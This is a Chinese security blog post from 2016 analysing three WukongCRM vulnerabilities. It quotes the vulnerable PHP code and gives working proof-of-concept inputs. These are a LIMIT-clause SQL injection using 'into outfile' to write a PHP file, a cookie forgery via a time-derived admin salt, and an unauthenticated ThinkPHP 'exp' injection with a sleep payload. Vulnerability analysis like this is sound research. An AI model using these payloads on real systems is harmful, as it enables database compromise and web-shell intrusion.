<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Manning23"><title>悟空CRM三处漏洞分析 · Manning23</title><meta name="description" content="0x00 漏洞介绍悟空CRM是国内知名开源CRM。提供开源免费版本、旗舰版、云平台版本等。支持本地部署、SaaS模式。此次分析的三个漏洞均属于高危漏洞，并且各有特点。
漏洞如下：

悟空CRM SQL注入导致getshell漏洞
悟空CRM从无任何权限到Getshell漏洞分析
悟空CRM无需任何权"><meta name="keywords"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Manning23</a></h3><div class="description"><p>Technology &amp; Life</p></div></div></div><ul class="social-links"><li><a href="http://weibo.com/2077484845"><i class="fa fa-weibo"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li></div><div class="information"><div class="back_btn"><li><a onclick="window.history.go(-1)" class="fa fa-chevron-left"> </a></li></div><div class="avatar"><img src="/images/avatar.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>悟空CRM三处漏洞分析</a></h3></div><div class="post-content"><h3 id="0x00-漏洞介绍"><a href="#0x00-漏洞介绍" class="headerlink" title="0x00 漏洞介绍"></a>0x00 漏洞介绍</h3><p>悟空CRM是国内知名开源CRM。提供开源免费版本、旗舰版、云平台版本等。支持本地部署、SaaS模式。此次分析的三个漏洞均属于高危漏洞，并且各有特点。</p>
<p>漏洞如下：</p>
<ul>
<li><a href="http://www.wooyun.org/bugs/wooyun-2016-0193153" target="_blank" rel="external">悟空CRM SQL注入导致getshell漏洞</a></li>
<li><a href="http://www.wooyun.org/bugs/wooyun-2016-0193223" target="_blank" rel="external">悟空CRM从无任何权限到Getshell漏洞分析</a></li>
<li><a href="http://www.wooyun.org/bugs/wooyun-2016-0194030" target="_blank" rel="external">悟空CRM无需任何权限的SQL注入漏洞</a></li>
</ul>
<h3 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h3><h4 id="漏洞1，悟空CRM-SQL注入导致getshell漏洞"><a href="#漏洞1，悟空CRM-SQL注入导致getshell漏洞" class="headerlink" title="漏洞1，悟空CRM SQL注入导致getshell漏洞"></a>漏洞1，悟空CRM SQL注入导致getshell漏洞</h4><p>此漏洞需要登录，因此不是无权限的。但是利用sql注入getshell的方式却利用了一个不常见的技巧，此技巧曾在ctf（三个白帽ctf游戏）出现。</p>
<p>在文件 \App\Lib\Action\BusinessAction.class.php 664 行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">if($_GET[&apos;listrows&apos;])&#123;</div><div class="line">			$listrows = $_GET[&apos;listrows&apos;];</div><div class="line">			$params[] = &quot;listrows=&quot; . trim($_GET[&apos;listrows&apos;]);</div><div class="line">		&#125;else&#123;</div><div class="line">			$listrows = 15;</div><div class="line">			$params[] = &quot;listrows=15&quot;;</div><div class="line">		&#125;</div><div class="line">		$list = $d_v_business-&gt;where($where)-&gt;order($order)-&gt;page($p.&apos;,&apos;.$listrows)-&gt;select();</div></pre></td></tr></table></figure>
<p>此处出现了很明显的sql拼接情况，但是此处拼接的位置非常尴尬，是在limit参数后。</p>
<p>我们来说下sql注入在limit参数后的情况。</p>
<p>mysql中，limit的意思为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">select * from table limit m,n</div><div class="line">其中m是指记录开始的index，从0开始，表示第一条记录</div><div class="line">n是指从第m+1条开始，取n条。</div><div class="line">select * from tablename limit 2,4</div><div class="line">即取出第3条至第6条，4条记录</div></pre></td></tr></table></figure>
<p>mysql中，在limit参数化能实现的功能有限，目前已知可利用的方式为三种。</p>
<ul>
<li>报错注入（mysql 5.6以下）</li>
<li>延时盲注（mysql 5.6以下）</li>
<li>直接写文件</li>
</ul>
<p>前两种利用参见 <a href="http://www.freebuf.com/articles/web/57528.html" target="_blank" rel="external">http://www.freebuf.com/articles/web/57528.html</a></p>
<p>直接写文件是利用了 limit 后可以拼接 into outfile的特性。</p>
<p>我们访问如下url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://192.168.103.129/wkcrm/index.php?m=Business&amp;listrows=10 into outfile &apos;C:\\wamp\\www\\wkcrm\\f.php&apos;</div></pre></td></tr></table></figure>
<p>可以在文件目录看到</p>
<p><img src="1.png" alt=""></p>
<p>由于此利用方式需要依靠前面select的内容，因此此getshell的方式比较特殊。不像union select后的into outfile一样灵活。</p>
<h4 id="漏洞2，悟空CRM从无任何权限到Getshell漏洞"><a href="#漏洞2，悟空CRM从无任何权限到Getshell漏洞" class="headerlink" title="漏洞2，悟空CRM从无任何权限到Getshell漏洞"></a>漏洞2，悟空CRM从无任何权限到Getshell漏洞</h4><p>第二个漏洞的关键点为低强度的加密key。</p>
<p>文件 App/Lib/Behavior/AuthenticateBehavior.class.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">if(!session(&apos;?user_id&apos;) &amp;&amp; intval(cookie(&apos;user_id&apos;)) != 0 &amp;&amp; trim(cookie(&apos;name&apos;)) != &apos;&apos; &amp;&amp; trim(cookie(&apos;salt_code&apos;)) != &apos;&apos;)&#123;</div><div class="line">			$user = M(&apos;user&apos;)-&gt;where(array(&apos;user_id&apos; =&gt; intval(cookie(&apos;user_id&apos;))))-&gt;find();</div><div class="line">			if (md5(md5($user[&apos;user_id&apos;] . $user[&apos;name&apos;]).$user[&apos;salt&apos;]) == trim(cookie(&apos;salt_code&apos;))) &#123;</div><div class="line">				$d_role = D(&apos;RoleView&apos;);</div><div class="line">				$role = $d_role-&gt;where(&apos;user.user_id = %d&apos;, $user[&apos;user_id&apos;])-&gt;find();</div><div class="line">				if($user[&apos;category_id&apos;] == 1)&#123;</div><div class="line">					session(&apos;admin&apos;, 1);</div><div class="line">				&#125;</div><div class="line">				session(&apos;role_id&apos;, $role[&apos;role_id&apos;]);</div><div class="line">				session(&apos;position_id&apos;, $role[&apos;position_id&apos;]);</div><div class="line">				session(&apos;role_name&apos;, $role[&apos;role_name&apos;]);</div><div class="line">				session(&apos;department_id&apos;, $role[&apos;department_id&apos;]);</div><div class="line">				session(&apos;name&apos;, $user[&apos;name&apos;]);</div><div class="line">				session(&apos;user_id&apos;, $user[&apos;user_id&apos;]);</div><div class="line">			&#125;</div><div class="line">		&#125;</div></pre></td></tr></table></figure>
<p>从上面代码可以看到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">if (md5(md5($user[&apos;user_id&apos;] . $user[&apos;name&apos;]).$user[&apos;salt&apos;]) == trim(cookie(&apos;salt_code&apos;)))</div></pre></td></tr></table></figure>
<p>若上式成立，即能完成session赋值操作。</p>
<p>以管理员为例：</p>
<p>$user[‘user_id’] ： 已知，为1</p>
<p>$user[‘name’] ： 已知，为admin</p>
<p>$user[‘salt’] ： 未知</p>
<p>cookie(‘salt_code’) ：已知，为我传入的cookie</p>
<p>那么，实际上这个if语句只有一个参数是未知的，那就是salt。我们看看salt是怎么生成的：</p>
<p>在文件 /App/Lib/Action/InstallAction.class.php 216行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$salt = substr(md5(time()),0,4);</div><div class="line">$password = md5(md5(trim($password)) . $salt);</div></pre></td></tr></table></figure>
<p>salt只和time()有关的，也就是说，只要知道了安装的时候的时间，就可以知道管理员的salt。</p>
<p>那么，如何知道安装的时间呢？</p>
<p>1.跑，猜测。运气最差为 36^^4次</p>
<p>2.通过Last-Modified得知</p>
<pre><code>在HTTP协议里，当我们请求一些静态文件的时候，服务器默认会将这个文件的修改时间作为Last-Modified这个头的值返回。
</code></pre><p>具体利用参见 <a href="http://www.wooyun.org/bugs/wooyun-2016-0193223" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2016-0193223</a></p>
<p>本文想说的是，弱key存在被破解的风险。</p>
<h4 id="漏洞3，悟空CRM无需任何权限的SQL注入漏洞"><a href="#漏洞3，悟空CRM无需任何权限的SQL注入漏洞" class="headerlink" title="漏洞3，悟空CRM无需任何权限的SQL注入漏洞"></a>漏洞3，悟空CRM无需任何权限的SQL注入漏洞</h4><p>此漏洞为暗含一个ThinkPHP特性的漏洞。</p>
<p>在文件 /App/Lib/Mobile/LogMobile.class.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">public function edit()&#123;</div><div class="line">		if($this-&gt;isPost())&#123;</div><div class="line">			$id = isset($_POST[&apos;id&apos;]) ? intval($_POST[&apos;id&apos;]) : 0;</div><div class="line">			$params = json_decode($_POST[&apos;params&apos;],true);</div><div class="line">			if(!is_array($params))&#123;</div><div class="line">				$this-&gt;ajaxReturn(&apos;非法的数据格式!&apos;,&apos;非法的数据格式!&apos;,2);</div><div class="line">			&#125;</div><div class="line">			if(!$id)&#123;</div><div class="line">				$this-&gt;ajaxReturn(&apos;参数错误&apos;,&apos;参数错误&apos;,2);</div><div class="line">			&#125;</div><div class="line">			$log = M(&apos;Log&apos;);</div><div class="line">			$log -&gt; create($params);</div><div class="line">			$log -&gt; update_date = time();</div><div class="line">			$result = $log-&gt;save();</div><div class="line">			if($result)&#123;</div><div class="line">				$this-&gt;ajaxReturn(&apos;修改成功&apos;,&apos;修改成功&apos;,1);</div><div class="line">			&#125;else&#123;</div><div class="line">				$this-&gt;ajaxReturn(&apos;修改失败，请重试&apos;,&apos;修改失败，请重试&apos;,2);</div><div class="line">			&#125;</div><div class="line">		&#125;</div><div class="line">	&#125;</div></pre></td></tr></table></figure>
<p>这里create方法先获取所有$params，并根据POST中传入的主键（log_id）来update数据库。而update的where实际上就是 array(‘log_id’, $params[‘log_id’]);</p>
<p>只要我传入的$params[‘role_id’]的值是数组，并且数组的第一个参数是exp，那么第二个参数就可以直接填SQL注入语句。</p>
<p>POC为</p>
<p><a href="http://192.168.103.129/wkcrm/mobile.php?m=log&amp;a=edit" target="_blank" rel="external">http://192.168.103.129/wkcrm/mobile.php?m=log&amp;a=edit</a></p>
<p>id=1&amp;params={“log_id”:[“exp”,”=sleep(3)”],”content”:”admin”}</p>
<p><img src="2.png" alt=""></p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2016-04-23</span><i class="fa fa-tag"></i></div></div></div></div><div class="share"><div class="evernote"><a href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank" class="fa fa-bookmark"></a></div><div class="weibo"><a href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));" class="fa fa-weibo"></a></div><div class="twitter"><a href="http://twitter.com/home?status=,http://yoursite.com/2016/04/23/悟空CRM三处漏洞分析/,Manning23,悟空CRM三处漏洞分析,;" class="fa fa-twitter"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a role="navigation" href="/2016/05/05/ImageMagic初步分析/" title="ImageMagic初步分析" class="btn">上一篇</a></li><li class="next pagbuttons"><a role="navigation" href="/2016/03/23/三个白猫抓flag鼠系列1writeup/" title="三个白猫抓flag鼠系列1writeup" class="btn">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>